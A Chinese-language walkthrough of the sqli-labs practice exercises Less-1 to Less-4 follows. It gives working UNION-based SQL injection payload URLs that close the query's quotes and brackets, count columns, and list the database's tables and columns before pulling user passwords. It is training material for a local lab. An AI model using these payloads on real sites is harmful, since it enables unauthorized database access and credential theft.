Basic Chllenge
Less-1
判断注入点:
http://127.0.0.1/sqli-lab/Less-1/?id=1
‘找到注入点,发现已经闭合:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1” LIMIT 0,1′ at line 1
接下来注释注入就可以了。可以用#或–+注释。
猜字段数:
http://127.0.0.1/sqli-lab/Less-1/?id=1′ order by 3–+
4的时候报错,3的时候不报错,判断字段数为3.
查库:
http://127.0.0.1/sqli-lab/Less-1/?id=-1′ union select 1,2,3–+
显示位为2,3.
http://127.0.0.1/sqli-lab/Less-1/?id=-1′ union select 1,database(),version()–+http://127.0.0.1/sqli-lab/Less-1/?id=-1′ union select 1,2,group_concat(database(),version())–+
数据库为security;数据库版本为5.5.53.
查表:
http://127.0.0.1/sqli-lab/Less-1/?id=-1′ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security’–+
表:emails,referers,uagents,users.
查列:
http://127.0.0.1/sqli-lab/Less-1/?id=-1′ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’users’–+
列:id,username,password.
查内容:
http://127.0.0.1/sqli-lab/Less-1/?id=-1′ union select 1,2,password from users–+
password:Dumb.
Less-2
查找注入点:
http://127.0.0.1/sqli-lab/Less-2/?id=1′
发现报错信息,输入的单引号并没有把语句闭合。原来已经闭合加上’又多了一个’:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” LIMIT 0,1′ at line 1
因此把Less-1的’去掉即可。
payload:
http://127.0.0.1/sqli-lab/Less-2/?id=1–+
其他部分和Less-1一样。
Less-3
查找注入点:
http://127.0.0.1/sqli-lab/Less-3/?id=1′
通过报错信息发现还有括号,应该利用引号+括号闭合语句:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”) LIMIT 0,1′ at line 1
paylaod:
http://127.0.0.1/sqli-lab/Less-3/?id=1′)–+
其他部分和Less-1一样。
Less-4
查找注入点:
http://127.0.0.1/sqli-lab/Less-4/?id=1′
加单引号发现没有报错。
http://127.0.0.1/sqli-lab/Less-4/?id=1″
加双引号报错,通过报错信息发现需要双引号和括号闭合:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”1″”) LIMIT 0,1’ at line 1
paylaod:
http://127.0.0.1/sqli-lab/Less-4/?id=1″)–+
其他部分和Less-1一样。
